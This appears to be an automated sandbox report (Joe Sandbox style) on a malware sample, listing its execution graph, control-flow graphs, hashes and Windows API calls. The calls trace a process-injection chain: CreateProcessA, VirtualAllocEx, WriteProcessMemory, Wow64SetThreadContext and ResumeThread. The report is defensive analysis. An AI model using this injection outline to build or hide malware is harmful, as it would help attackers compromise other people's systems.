                                                                                            • Instruction ID: 92cd898af770a6ca50bcb21f1407ae0af07f3f2ff1fbcf284ab1b0f925123040
                                                                                            • Opcode Fuzzy Hash: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
                                                                                            • Instruction Fuzzy Hash: C121CD30624B0D8BCB45CF9998A17DEB7E1FF88344F00461DE44AEB244DBB0E9158BC2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Execution Graph

                                                                                            Execution Coverage:8.6%
                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                            Signature Coverage:0%
                                                                                            Total number of Nodes:236
                                                                                            Total number of Limit Nodes:12
                                                                                            execution_graph 27486 daad98 27490 daae7f 27486->27490 27498 daae90 27486->27498 27487 daada7 27491 daaec4 27490->27491 27492 daaea1 27490->27492 27491->27487 27492->27491 27506 dab118 27492->27506 27510 dab128 27492->27510 27493 dab0c8 GetModuleHandleW 27495 dab0f5 27493->27495 27494 daaebc 27494->27491 27494->27493 27495->27487 27499 daaea1 27498->27499 27501 daaec4 27498->27501 27499->27501 27504 dab118 LoadLibraryExW 27499->27504 27505 dab128 LoadLibraryExW 27499->27505 27500 daaebc 27500->27501 27502 dab0c8 GetModuleHandleW 27500->27502 27501->27487 27503 dab0f5 27502->27503 27503->27487 27504->27500 27505->27500 27507 dab13c 27506->27507 27509 dab161 27507->27509 27514 daa8d0 27507->27514 27509->27494 27511 dab13c 27510->27511 27512 dab161 27511->27512 27513 daa8d0 LoadLibraryExW 27511->27513 27512->27494 27513->27512 27515 dab308 LoadLibraryExW 27514->27515 27517 dab381 27515->27517 27517->27509 27518 dad118 27519 dad15e GetCurrentProcess 27518->27519 27521 dad1a9 27519->27521 27522 dad1b0 GetCurrentThread 27519->27522 27521->27522 27523 dad1ed GetCurrentProcess 27522->27523 27524 dad1e6 27522->27524 27525 dad223 27523->27525 27524->27523 27526 dad24b GetCurrentThreadId 27525->27526 27527 dad27c 27526->27527 27751 da4668 27752 da467a 27751->27752 27753 da4686 27752->27753 27755 da4778 27752->27755 27756 da479d 27755->27756 27760 da4888 27756->27760 27764 da4878 27756->27764 27762 da48af 27760->27762 27761 da498c 27761->27761 27762->27761 27768 da449c 27762->27768 27765 da48af 27764->27765 27766 da498c 27765->27766 27767 da449c CreateActCtxA 27765->27767 27766->27766 27767->27766 27769 da5918 CreateActCtxA 27768->27769 27771 da59db 27769->27771 27723 6fc90ef 27724 6fc90f7 27723->27724 27731 6fcb7df 27724->27731 27735 6fcb7f0 27724->27735 27725 6fc912e 27726 6fc932e 27725->27726 27727 6fcb7df ResumeThread 27725->27727 27728 6fcb7f0 ResumeThread 27725->27728 27727->27725 27728->27725 27732 6fcb7e6 27731->27732 27733 6fcb891 27732->27733 27734 6fcbbda ResumeThread 27732->27734 27733->27725 27734->27733 27736 6fcb823 27735->27736 27737 6fcb891 27736->27737 27738 6fcbbda ResumeThread 27736->27738 27737->27725 27738->27737 27528 6fcc939 27529 6fccd0f 27528->27529 27534 6fce156 27529->27534 27552 6fce0e0 27529->27552 27569 6fce0f0 27529->27569 27530 6fccd1f 27535 6fce0e4 27534->27535 27536 6fce159 27534->27536 27548 6fce112 27535->27548 27586 6fce79e 27535->27586 27590 6fcea07 27535->27590 27599 6fce6c5 27535->27599 27604 6fce888 27535->27604 27609 6fcee0f 27535->27609 27614 6fce84e 27535->27614 27621 6fce633 27535->27621 27626 6fce531 27535->27626 27631 6fce971 27535->27631 27640 6fce89b 27535->27640 27645 6fcebbb 27535->27645 27649 6fce599 27535->27649 27654 6fcea19 27535->27654 27659 6fce8b8 27535->27659 27536->27530 27548->27530 27553 6fce0f0 27552->27553 27554 6fce112 27553->27554 27555 6fce79e 2 API calls 27553->27555 27556 6fce8b8 2 API calls 27553->27556 27557 6fcea19 2 API calls 27553->27557 27558 6fce599 2 API calls 27553->27558 27559 6fcebbb 2 API calls 27553->27559 27560 6fce89b 2 API calls 27553->27560 27561 6fce971 4 API calls 27553->27561 27562 6fce531 2 API calls 27553->27562 27563 6fce633 2 API calls 27553->27563 27564 6fce84e 2 API calls 27553->27564 27565 6fcee0f 2 API calls 27553->27565 27566 6fce888 2 API calls 27553->27566 27567 6fce6c5 2 API calls 27553->27567 27568 6fcea07 4 API calls 27553->27568 27554->27530 27555->27554 27556->27554 27557->27554 27558->27554 27559->27554 27560->27554 27561->27554 27562->27554 27563->27554 27564->27554 27565->27554 27566->27554 27567->27554 27568->27554 27570 6fce10a 27569->27570 27571 6fce79e 2 API calls 27570->27571 27572 6fce8b8 2 API calls 27570->27572 27573 6fcea19 2 API calls 27570->27573 27574 6fce599 2 API calls 27570->27574 27575 6fcebbb 2 API calls 27570->27575 27576 6fce89b 2 API calls 27570->27576 27577 6fce971 4 API calls 27570->27577 27578 6fce531 2 API calls 27570->27578 27579 6fce633 2 API calls 27570->27579 27580 6fce84e 2 API calls 27570->27580 27581 6fcee0f 2 API calls 27570->27581 27582 6fce112 27570->27582 27583 6fce888 2 API calls 27570->27583 27584 6fce6c5 2 API calls 27570->27584 27585 6fcea07 4 API calls 27570->27585 27571->27582 27572->27582 27573->27582 27574->27582 27575->27582 27576->27582 27577->27582 27578->27582 27579->27582 27580->27582 27581->27582 27582->27530 27583->27582 27584->27582 27585->27582 27664 6fcbc88 27586->27664 27668 6fcbc90 27586->27668 27587 6fce7b8 27587->27548 27591 6fce6c7 27590->27591 27592 6fcefe6 27591->27592 27593 6fceadb 27591->27593 27595 6fcbc88 Wow64SetThreadContext 27591->27595 27596 6fcbc90 Wow64SetThreadContext 27591->27596 27592->27548 27672 6fcf2a0 27593->27672 27677 6fcf293 27593->27677 27594 6fce60d 27595->27591 27596->27591 27600 6fceadb 27599->27600 27602 6fcf2a0 2 API calls 27600->27602 27603 6fcf293 2 API calls 27600->27603 27601 6fce60d 27602->27601 27603->27601 27605 6fce895 27604->27605 27607 6fcf2a0 2 API calls 27605->27607 27608 6fcf293 2 API calls 27605->27608 27606 6fce60d 27607->27606 27608->27606 27610 6fcee12 27609->27610 27611 6fcecae 27609->27611 27611->27548 27691 6fcc34a 27611->27691 27695 6fcc350 27611->27695 27615 6fcedac 27614->27615 27616 6fcecae 27615->27616 27619 6fcc34a ReadProcessMemory 27615->27619 27620 6fcc350 ReadProcessMemory 27615->27620 27616->27548 27617 6fcc34a ReadProcessMemory 27616->27617 27618 6fcc350 ReadProcessMemory 27616->27618 27617->27616 27618->27616 27619->27616 27620->27616 27622 6fce9aa 27621->27622 27699 6fcc258 27622->27699 27703 6fcc260 27622->27703 27623 6fcec78 27627 6fce53f 27626->27627 27707 6fcc4dc 27627->27707 27711 6fcc4e8 27627->27711 27638 6fcbc88 Wow64SetThreadContext 27631->27638 27639 6fcbc90 Wow64SetThreadContext 27631->27639 27632 6fce6c7 27632->27631 27633 6fcefe6 27632->27633 27634 6fceadb 27632->27634 27633->27548 27636 6fcf2a0 2 API calls 27634->27636 27637 6fcf293 2 API calls 27634->27637 27635 6fce60d 27636->27635 27637->27635 27638->27632 27639->27632 27641 6fce8a8 27640->27641 27643 6fcc258 WriteProcessMemory 27641->27643 27644 6fcc260 WriteProcessMemory 27641->27644 27642 6fcea51 27643->27642 27644->27642 27715 6fcc1a0 27645->27715 27719 6fcc198 27645->27719 27646 6fcebdc 27650 6fce535 27649->27650 27652 6fcc4dc CreateProcessA 27650->27652 27653 6fcc4e8 CreateProcessA 27650->27653 27651 6fce5e2 27652->27651 27653->27651 27655 6fcea1f 27654->27655 27657 6fcc258 WriteProcessMemory 27655->27657 27658 6fcc260 WriteProcessMemory 27655->27658 27656 6fcea51 27657->27656 27658->27656 27660 6fce8db 27659->27660 27662 6fcc258 WriteProcessMemory 27660->27662 27663 6fcc260 WriteProcessMemory 27660->27663 27661 6fceb9c 27662->27661 27663->27661 27665 6fcbc90 Wow64SetThreadContext 27664->27665 27667 6fcbd1d 27665->27667 27667->27587 27669 6fcbcd5 Wow64SetThreadContext 27668->27669 27671 6fcbd1d 27669->27671 27671->27587 27673 6fcf2b5 27672->27673 27682 6fcbbda 27673->27682 27687 6fcbbe0 27673->27687 27674 6fcf2c8 27674->27594 27678 6fcf2a0 27677->27678 27680 6fcbbda ResumeThread 27678->27680 27681 6fcbbe0 ResumeThread 27678->27681 27679 6fcf2c8 27679->27594 27680->27679 27681->27679 27683 6fcbbad 27682->27683 27684 6fcbbde ResumeThread 27682->27684 27683->27674 27686 6fcbc51 27684->27686 27686->27674 27688 6fcbc20 ResumeThread 27687->27688 27690 6fcbc51 27688->27690 27690->27674 27692 6fcc350 ReadProcessMemory 27691->27692 27694 6fcc3df 27692->27694 27694->27611 27696 6fcc39b ReadProcessMemory 27695->27696 27698 6fcc3df 27696->27698 27698->27611 27700 6fcc260 WriteProcessMemory 27699->27700 27702 6fcc2ff 27700->27702 27702->27623 27704 6fcc2a8 WriteProcessMemory 27703->27704 27706 6fcc2ff 27704->27706 27706->27623 27708 6fcc4e8 CreateProcessA 27707->27708 27710 6fcc733 27708->27710 27712 6fcc571 CreateProcessA 27711->27712 27714 6fcc733 27712->27714 27716 6fcc1e0 VirtualAllocEx 27715->27716 27718 6fcc21d 27716->27718 27718->27646 27720 6fcc1a0 VirtualAllocEx 27719->27720 27722 6fcc21d 27720->27722 27722->27646 27739 6fc9329 27740 6fc92bd 27739->27740 27741 6fc932e 27739->27741 27740->27739 27742 6fcb7df ResumeThread 27740->27742 27743 6fcb7f0 ResumeThread 27740->27743 27742->27740 27743->27740 27772 6fc9146 27773 6fc8b68 27772->27773 27775 6fc8fb9 27773->27775 27776 6fcb7df ResumeThread 27773->27776 27777 6fcb7f0 ResumeThread 27773->27777 27774 6fc8e09 27776->27774 27777->27774 27778 dad421 27779 dad3e4 DuplicateHandle 27778->27779 27781 dad42a 27778->27781 27780 dad3f6 27779->27780 27744 6fcf461 27745 6fcf473 27744->27745 27747 6fcf342 27744->27747 27745->27745 27747->27744 27747->27745 27748 6fca720 27747->27748 27749 6fcf568 PostMessageW 27748->27749 27750 6fcf5d4 27749->27750 27750->27747

                                                                                            Executed Functions

                                                                                            Function 00DAD108 Relevance: 6.1, APIs: 4, Instructions: 133threadCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 294 dad108-dad1a7 GetCurrentProcess 298 dad1a9-dad1af 294->298 299 dad1b0-dad1e4 GetCurrentThread 294->299 298->299 300 dad1ed-dad221 GetCurrentProcess 299->300 301 dad1e6-dad1ec 299->301 303 dad22a-dad245 call dad2e9 300->303 304 dad223-dad229 300->304 301->300 307 dad24b-dad27a GetCurrentThreadId 303->307 304->303 308 dad27c-dad282 307->308 309 dad283-dad2e5 307->309 308->309
                                                                                            APIs
                                                                                            • GetCurrentProcess.KERNEL32 ref: 00DAD196
                                                                                            • GetCurrentThread.KERNEL32 ref: 00DAD1D3
                                                                                            • GetCurrentProcess.KERNEL32 ref: 00DAD210
                                                                                            • GetCurrentThreadId.KERNEL32 ref: 00DAD269
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000B.00000002.1738807999.0000000000DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DA0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_11_2_da0000_SdYCcXyq.jbxd
                                                                                            Similarity
                                                                                            • API ID: Current$ProcessThread
                                                                                            • String ID:
                                                                                            • API String ID: 2063062207-0
                                                                                            • Opcode ID: eaf8bc189388875203d1a69e15fb891229f068c1817829ad7a3b96df2691471d
                                                                                            • Instruction ID: b48c9d5235c3de8109a6781b9e6fa5565452d9446a4a47e84e5de9387fc3c8c4
                                                                                            • Opcode Fuzzy Hash: eaf8bc189388875203d1a69e15fb891229f068c1817829ad7a3b96df2691471d
                                                                                            • Instruction Fuzzy Hash: 3C5144B09003098FDB14DFAAD648BEEBBF1EF49314F248459E459A7360D7349988CB65
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00DAD118 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 316 dad118-dad1a7 GetCurrentProcess 320 dad1a9-dad1af 316->320 321 dad1b0-dad1e4 GetCurrentThread 316->321 320->321 322 dad1ed-dad221 GetCurrentProcess 321->322 323 dad1e6-dad1ec 321->323 325 dad22a-dad245 call dad2e9 322->325 326 dad223-dad229 322->326 323->322 329 dad24b-dad27a GetCurrentThreadId 325->329 326->325 330 dad27c-dad282 329->330 331 dad283-dad2e5 329->331 330->331
                                                                                            APIs
                                                                                            • GetCurrentProcess.KERNEL32 ref: 00DAD196
                                                                                            • GetCurrentThread.KERNEL32 ref: 00DAD1D3
                                                                                            • GetCurrentProcess.KERNEL32 ref: 00DAD210
                                                                                            • GetCurrentThreadId.KERNEL32 ref: 00DAD269
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000B.00000002.1738807999.0000000000DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DA0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_11_2_da0000_SdYCcXyq.jbxd
                                                                                            Similarity
                                                                                            • API ID: Current$ProcessThread
                                                                                            • String ID:
                                                                                            • API String ID: 2063062207-0
                                                                                            • Opcode ID: 14fa6410ddd8fd91e8444e1fb5251c6a3e3daf836ce6878560de3e0da3d391a9
                                                                                            • Instruction ID: 03bc187ffa6a36fac4b7c696cf51a033f4714a18f7476a963f1ab0e19078d4ea
                                                                                            • Opcode Fuzzy Hash: 14fa6410ddd8fd91e8444e1fb5251c6a3e3daf836ce6878560de3e0da3d391a9
                                                                                            • Instruction Fuzzy Hash: 155123B0D003098FDB14DFAAD548BAEBBF1EF89314F248459E419A7360DB749988CF65
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 06FCC4DC Relevance: 1.7, APIs: 1, Instructions: 248processCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 515 6fcc4dc-6fcc57d 518 6fcc57f-6fcc589 515->518 519 6fcc5b6-6fcc5d6 515->519 518->519 520 6fcc58b-6fcc58d 518->520 526 6fcc60f-6fcc63e 519->526 527 6fcc5d8-6fcc5e2 519->527 521 6fcc58f-6fcc599 520->521 522 6fcc5b0-6fcc5b3 520->522 524 6fcc59d-6fcc5ac 521->524 525 6fcc59b 521->525 522->519 524->524 528 6fcc5ae 524->528 525->524 533 6fcc677-6fcc731 CreateProcessA 526->533 534 6fcc640-6fcc64a 526->534 527->526 529 6fcc5e4-6fcc5e6 527->529 528->522 531 6fcc5e8-6fcc5f2 529->531 532 6fcc609-6fcc60c 529->532 535 6fcc5f4 531->535 536 6fcc5f6-6fcc605 531->536 532->526 547 6fcc73a-6fcc7c0 533->547 548 6fcc733-6fcc739 533->548 534->533 537 6fcc64c-6fcc64e 534->537 535->536 536->536 538 6fcc607 536->538 539 6fcc650-6fcc65a 537->539 540 6fcc671-6fcc674 537->540 538->532 542 6fcc65c 539->542 543 6fcc65e-6fcc66d 539->543 540->533 542->543 543->543 544 6fcc66f 543->544 544->540 558 6fcc7d0-6fcc7d4 547->558 559 6fcc7c2-6fcc7c6 547->559 548->547 561 6fcc7e4-6fcc7e8 558->561 562 6fcc7d6-6fcc7da 558->562 559->558 560 6fcc7c8 559->560 560->558 564 6fcc7f8-6fcc7fc 561->564 565 6fcc7ea-6fcc7ee 561->565 562->561 563 6fcc7dc 562->563 563->561 567 6fcc80e-6fcc815 564->567 568 6fcc7fe-6fcc804 564->568 565->564 566 6fcc7f0 565->566 566->564 569 6fcc82c 567->569 570 6fcc817-6fcc826 567->570 568->567 572 6fcc82d 569->572 570->569 572->572
                                                                                            APIs
                                                                                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06FCC71E
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000B.00000002.1745021468.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_11_2_6fc0000_SdYCcXyq.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateProcess
                                                                                            • String ID:
                                                                                            • API String ID: 963392458-0
                                                                                            • Opcode ID: eb243836d2b28c2622223073c15c22c67556877d610d24cb86e7b0fb755f1cb4
                                                                                            • Instruction ID: fb0f2b1dce9256793558d31bf418d0e390d3ab19bb4a0b3be0335bd2f5a1c7e3
                                                                                            • Opcode Fuzzy Hash: eb243836d2b28c2622223073c15c22c67556877d610d24cb86e7b0fb755f1cb4
                                                                                            • Instruction Fuzzy Hash: AAA19F71D0021ADFDB54CFA8C9417EEBBB2FF45320F1485AAE818A7240DB749985DF92
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 06FCC4E8 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 573 6fcc4e8-6fcc57d 575 6fcc57f-6fcc589 573->575 576 6fcc5b6-6fcc5d6 573->576 575->576 577 6fcc58b-6fcc58d 575->577 583 6fcc60f-6fcc63e 576->583 584 6fcc5d8-6fcc5e2 576->584 578 6fcc58f-6fcc599 577->578 579 6fcc5b0-6fcc5b3 577->579 581 6fcc59d-6fcc5ac 578->581 582 6fcc59b 578->582 579->576 581->581 585 6fcc5ae 581->585 582->581 590 6fcc677-6fcc731 CreateProcessA 583->590 591 6fcc640-6fcc64a 583->591 584->583 586 6fcc5e4-6fcc5e6 584->586 585->579 588 6fcc5e8-6fcc5f2 586->588 589 6fcc609-6fcc60c 586->589 592 6fcc5f4 588->592 593 6fcc5f6-6fcc605 588->593 589->583 604 6fcc73a-6fcc7c0 590->604 605 6fcc733-6fcc739 590->605 591->590 594 6fcc64c-6fcc64e 591->594 592->593 593->593 595 6fcc607 593->595 596 6fcc650-6fcc65a 594->596 597 6fcc671-6fcc674 594->597 595->589 599 6fcc65c 596->599 600 6fcc65e-6fcc66d 596->600 597->590 599->600 600->600 601 6fcc66f 600->601 601->597 615 6fcc7d0-6fcc7d4 604->615 616 6fcc7c2-6fcc7c6 604->616 605->604 618 6fcc7e4-6fcc7e8 615->618 619 6fcc7d6-6fcc7da 615->619 616->615 617 6fcc7c8 616->617 617->615 621 6fcc7f8-6fcc7fc 618->621 622 6fcc7ea-6fcc7ee 618->622 619->618 620 6fcc7dc 619->620 620->618 624 6fcc80e-6fcc815 621->624 625 6fcc7fe-6fcc804 621->625 622->621 623 6fcc7f0 622->623 623->621 626 6fcc82c 624->626 627 6fcc817-6fcc826 624->627 625->624 629 6fcc82d 626->629 627->626 629->629
                                                                                            APIs
                                                                                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06FCC71E
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000B.00000002.1745021468.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_11_2_6fc0000_SdYCcXyq.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateProcess
                                                                                            • String ID:
                                                                                            • API String ID: 963392458-0
                                                                                            • Opcode ID: 9e43417b629aaff23e8f16605e8eb1b224b13d1be20b0366fe54b62a1cf1b070
                                                                                            • Instruction ID: 2416908cdac7842c3afc483ec213dfae5b6eabe896861d31333bc496723e586a
                                                                                            • Opcode Fuzzy Hash: 9e43417b629aaff23e8f16605e8eb1b224b13d1be20b0366fe54b62a1cf1b070
                                                                                            • Instruction Fuzzy Hash: 77918E71D0021ADFDB54CFA8C9407EDBBB2FF49324F1485AAE818A7240DB749985CF91
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00DAAE90 Relevance: 1.7, APIs: 1, Instructions: 195COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 630 daae90-daae9f 631 daaecb-daaecf 630->631 632 daaea1-daaeae call da9898 630->632 633 daaee3-daaf24 631->633 634 daaed1-daaedb 631->634 639 daaeb0 632->639 640 daaec4 632->640 641 daaf31-daaf3f 633->641 642 daaf26-daaf2e 633->642 634->633 685 daaeb6 call dab118 639->685 686 daaeb6 call dab128 639->686 640->631 644 daaf63-daaf65 641->644 645 daaf41-daaf46 641->645 642->641 643 daaebc-daaebe 643->640 646 dab000-dab0c0 643->646 647 daaf68-daaf6f 644->647 648 daaf48-daaf4f call daa874 645->648 649 daaf51 645->649 680 dab0c8-dab0f3 GetModuleHandleW 646->680 681 dab0c2-dab0c5 646->681 651 daaf7c-daaf83 647->651 652 daaf71-daaf79 647->652 650 daaf53-daaf61 648->650 649->650 650->647 655 daaf90-daaf92 call daa884 651->655 656 daaf85-daaf8d 651->656 652->651 659 daaf97-daaf99 655->659 656->655 661 daaf9b-daafa3 659->661 662 daafa6-daafab 659->662 661->662 663 daafc9-daafd6 662->663 664 daafad-daafb4 662->664 671 daafd8-daaff6 663->671 672 daaff9-daafff 663->672 664->663 666 daafb6-daafc6 call daa894 call daa8a4 664->666 666->663 671->672 682 dab0fc-dab110 680->682 683 dab0f5-dab0fb 680->683 681->680 683->682 685->643 686->643
                                                                                            APIs
                                                                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 00DAB0E6
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000B.00000002.1738807999.0000000000DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DA0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_11_2_da0000_SdYCcXyq.jbxd
                                                                                            Similarity
                                                                                            • API ID: HandleModule
                                                                                            • String ID:
                                                                                            • API String ID: 4139908857-0
                                                                                            • Opcode ID: 1a5ffb350126ac89ab6dc16955b252ff6741a29b319ed2e96c1afcbb3b1d7648
                                                                                            • Instruction ID: 15ca445150f8c2694447c67fba5c4766f5710372b2669c67fa95eca5aea0723f
                                                                                            • Opcode Fuzzy Hash: 1a5ffb350126ac89ab6dc16955b252ff6741a29b319ed2e96c1afcbb3b1d7648
                                                                                            • Instruction Fuzzy Hash: 087136B0A00B458FDB24DF2AD14175ABBF1FF89300F048A2DE48AD7A50D775E949CBA5
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00DA590C Relevance: 1.6, APIs: 1, Instructions: 98COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 687 da590c-da59d9 CreateActCtxA 689 da59db-da59e1 687->689 690 da59e2-da5a3c 687->690 689->690 697 da5a4b-da5a4f 690->697 698 da5a3e-da5a41 690->698 699 da5a60 697->699 700 da5a51-da5a5d 697->700 698->697 702 da5a61 699->702 700->699 702->702
                                                                                            APIs
                                                                                            • CreateActCtxA.KERNEL32(?), ref: 00DA59C9
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000B.00000002.1738807999.0000000000DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DA0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_11_2_da0000_SdYCcXyq.jbxd
                                                                                            Similarity
                                                                                            • API ID: Create
                                                                                            • String ID:
                                                                                            • API String ID: 2289755597-0
                                                                                            • Opcode ID: a32860e089dc58bab41a37100be1c10179619ecb25db8fd9a72c4ee8809d48fc
                                                                                            • Instruction ID: 3cec821263c310b9a4b13c29e2edc8ceffe06b807368c974638312a3fe9474d0
                                                                                            • Opcode Fuzzy Hash: a32860e089dc58bab41a37100be1c10179619ecb25db8fd9a72c4ee8809d48fc
                                                                                            • Instruction Fuzzy Hash: 034104B0D00719CFDB24CFA9D8847DDBBB5BF45304F2481AAD408AB255DBB56946CF90
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00DA449C Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 703 da449c-da59d9 CreateActCtxA 706 da59db-da59e1 703->706 707 da59e2-da5a3c 703->707 706->707 714 da5a4b-da5a4f 707->714 715 da5a3e-da5a41 707->715 716 da5a60 714->716 717 da5a51-da5a5d 714->717 715->714 719 da5a61 716->719 717->716 719->719
                                                                                            APIs
                                                                                            • CreateActCtxA.KERNEL32(?), ref: 00DA59C9
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000B.00000002.1738807999.0000000000DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DA0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_11_2_da0000_SdYCcXyq.jbxd
                                                                                            Similarity
                                                                                            • API ID: Create
                                                                                            • String ID:
                                                                                            • API String ID: 2289755597-0
                                                                                            • Opcode ID: 098c6ad0e4bbce8b9c4378c6a9f9855926ea63042828ee2c695aff62008acd2f
                                                                                            • Instruction ID: 8826df9ba0122b06303659c860dcb11cd506e9d31d0fb17026fb4699d7824da5
                                                                                            • Opcode Fuzzy Hash: 098c6ad0e4bbce8b9c4378c6a9f9855926ea63042828ee2c695aff62008acd2f
                                                                                            • Instruction Fuzzy Hash: 1541D2B0D0071DCBDB24DFAAC84479EBBF5BF49304F2481AAD408AB255DBB56949CF90
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00DAD421 Relevance: 1.6, APIs: 1, Instructions: 87COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 720 dad421-dad428 721 dad42a-dad54e 720->721 722 dad3e4-dad3f4 DuplicateHandle 720->722 723 dad3fd-dad41a 722->723 724 dad3f6-dad3fc 722->724 724->723
                                                                                            APIs
                                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00DAD3E7
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000B.00000002.1738807999.0000000000DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DA0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_11_2_da0000_SdYCcXyq.jbxd
                                                                                            Similarity
                                                                                            • API ID: DuplicateHandle
                                                                                            • String ID:
                                                                                            • API String ID: 3793708945-0
                                                                                            • Opcode ID: f9b16d9fa3e1fee8b111918f6f54313405dff7129eaf840e5f3f18fd93726b92
                                                                                            • Instruction ID: fad3e66fec236f6106cc227ea1a56b1837d317b60005852382ca0d7e2f73fd1e
                                                                                            • Opcode Fuzzy Hash: f9b16d9fa3e1fee8b111918f6f54313405dff7129eaf840e5f3f18fd93726b92
                                                                                            • Instruction Fuzzy Hash: 84316038A803848FEB04DF61E949B697BA2F7C8711F118929E915CB3E5CEB48857DF10
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 06FCC258 Relevance: 1.6, APIs: 1, Instructions: 72injectionCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 738 6fcc258-6fcc2ae 741 6fcc2be-6fcc2fd WriteProcessMemory 738->741 742 6fcc2b0-6fcc2bc 738->742 744 6fcc2ff-6fcc305 741->744 745 6fcc306-6fcc336 741->745 742->741 744->745
                                                                                            APIs
                                                                                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06FCC2F0
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000B.00000002.1745021468.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_11_2_6fc0000_SdYCcXyq.jbxd
                                                                                            Similarity
                                                                                            • API ID: MemoryProcessWrite
                                                                                            • String ID:
                                                                                            • API String ID: 3559483778-0
                                                                                            • Opcode ID: 2cd7301adf06ce5567c0efd00983021652a84fcfd65fddbbb3c222996c25a7d7
                                                                                            • Instruction ID: 192000781c6e2bebc2eb4118a3e8d4ab6e6cbbbe8dfb945486cbeda845ed0c8c
                                                                                            • Opcode Fuzzy Hash: 2cd7301adf06ce5567c0efd00983021652a84fcfd65fddbbb3c222996c25a7d7
                                                                                            • Instruction Fuzzy Hash: 462148B1D003599FCB10CFA9C985BDEBBF4FF48320F10842AE959A7240C7789544CBA4
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 06FCC260 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06FCC2F0
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000B.00000002.1745021468.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_11_2_6fc0000_SdYCcXyq.jbxd
                                                                                            Similarity
                                                                                            • API ID: MemoryProcessWrite
                                                                                            • String ID:
                                                                                            • API String ID: 3559483778-0
                                                                                            • Opcode ID: 65ca3a5165641f2fdd70f700d0399f831cf4a82d01b61408b31f7bc93608b4d3
